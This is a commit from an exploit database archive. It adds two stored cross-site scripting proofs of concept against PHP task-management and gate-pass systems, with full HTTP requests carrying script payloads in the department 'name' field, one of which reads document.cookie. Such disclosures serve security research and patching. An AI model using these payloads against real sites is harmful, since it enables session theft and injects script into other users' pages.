DB: 2021-11-11

2 changes to exploits/shellcodes

Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS)
Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)
This commit is contained in:
Offensive Security 2021-11-11 05:02:12 +00:00
parent d8eefee2c7
commit c26eab756e
3 changed files with 88 additions and 0 deletions

View file

@ -0,0 +1,36 @@
# Exploit Title: Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS)
# Date: 09/11/2021
# Exploit Author: Ragavender A G
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/edtms.zip
# Version: v1.0
# Tested on: Windows 10
*Exploit:*
1. Navigate to the URL, http://localhost/edtms/edtms/admin/?page=maintenance
2. Add New department with the following value:
- Name: *<svg/onload=alert(1)>*
3. Save the Department and refresh the page, which should trigger the payload.
*PoC:*
POST /edtms/edtms/Actions.php?a=save_department HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Origin: http://localhost
Connection: close
Referer: http://localhost/edtms/edtms/admin/?page=maintenance
Cookie: PHPSESSID=bmh8mhmk3r0rksta56msbl7dn3
id=&name=%3Csvg%2Fonload%3Dalert(100)%3E&status=1

View file

@ -0,0 +1,50 @@
# Exploit Title: Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)
# Date: 10.11.2021
# Exploit Author: İlhami Selamet
# Vendor Homepage: https://www.sourcecodester.com/php/15026/employee-and-visitor-gate-pass-logging-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=15026&title=Employee+and+Visitor+Gate+Pass+Logging+System+in+PHP+with+Source+Code
# Version: v1.0
# Tested on: Kali Linux + XAMPP v8.0.12
Employee and Visitor Gate Pass Logging System PHP 1.0 suffers from a Cross Site Scripting (XSS) vulnerability.
Step 1 - Login with admin account & navigate to 'Department List' tab. - http://localhost/employee_gatepass/admin/?page=maintenance/department
Step 1 - Click on the 'Create New' button for adding a new department.
Step 2 - Fill out all required fields to create a new department. Input a payload in the department 'name' field - <script>alert(document.cookie)</script>
Step 3 - Save the department.
The stored XSS triggers for all users that navigate to the 'Department List' page.
PoC
POST /employee_gatepass/classes/Master.php?f=save_department HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------407760789114464123714007564888
Content-Length: 555
Origin: http://localhost
Connection: close
Referer: http://localhost/employee_gatepass/admin/?page=maintenance/department
Cookie: PHPSESSID=8d0l6t3pq47irgnbipjjesrv54
-----------------------------407760789114464123714007564888
Content-Disposition: form-data; name="id"
-----------------------------407760789114464123714007564888
Content-Disposition: form-data; name="name"
<script>alert(document.cookie);</script>
-----------------------------407760789114464123714007564888
Content-Disposition: form-data; name="description"
desc
-----------------------------407760789114464123714007564888
Content-Disposition: form-data; name="status"
1
-----------------------------407760789114464123714007564888--

View file

@ -44604,3 +44604,5 @@ id,file,description,date,author,type,platform,port
50502,exploits/php/webapps/50502.txt,"Froxlor 0.10.29.1 - SQL Injection (Authenticated)",1970-01-01,"Martin Cernac",webapps,php,
50503,exploits/php/webapps/50503.txt,"WordPress Plugin Backup and Restore 1.0.3 - Arbitrary File Deletion",1970-01-01,"Murat DEMİRCİ",webapps,php,
50505,exploits/php/webapps/50505.py,"FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,Luska,webapps,php,
50506,exploits/php/webapps/50506.txt,"Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS)",1970-01-01,"Ragavender A G",webapps,php,
50507,exploits/php/webapps/50507.txt,"Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)",1970-01-01,"İlhami Selamet",webapps,php,

Can't render this file because it is too large.